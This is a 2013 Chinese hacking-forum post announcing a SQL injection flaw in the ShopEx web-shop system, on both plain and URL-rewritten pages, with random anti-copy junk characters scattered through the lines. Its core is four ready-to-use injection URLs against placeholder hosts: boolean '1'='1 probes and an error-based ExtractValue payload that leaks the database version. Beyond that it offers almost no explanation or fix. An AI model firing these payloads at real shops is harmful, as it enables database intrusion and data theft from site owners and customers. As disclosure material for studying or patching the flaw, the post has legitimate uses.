注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…9 i- g8 k6 e3 [4 _
7 W8 H7 q; {; |# b5 e
好吧,我扯远了~~; P: }: a' [( Y$ A6 ~
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~/ K" M- d' ^1 S- ?- z0 W$ n# _
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:$ L# K7 I; l6 I# e* `: o
( L; y0 L+ T1 S5 l! A& q6 K
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
6 g4 x N: E! x4 B9 ]7 V4 r& q$ i& q. v- w+ c
http://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html3 P) f7 j9 C8 A: k
/ L5 Y: @/ c: @! K5 P5 Lhttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html5 k, \# @' r& ]3 }+ h
6 s6 L( ^) K0 a9 F; hhttp://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html7 f8 _& M" Y- W8 } E# v
* @4 b O4 f. T: G3 a1 C$ Y! r
$ X- }3 F2 t. `; o0 V0 b& J
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。2 `4 \% I7 \0 O4 {
如何注入就不多说了,10多年的东西了…不会也会了…
2 p$ a4 [4 z4 u' W4 A8 ]' ]: ~3 r; N+ O& x/ x( m
|
发表于 2013-2-4 16:20:04
收藏
分享
支持
反对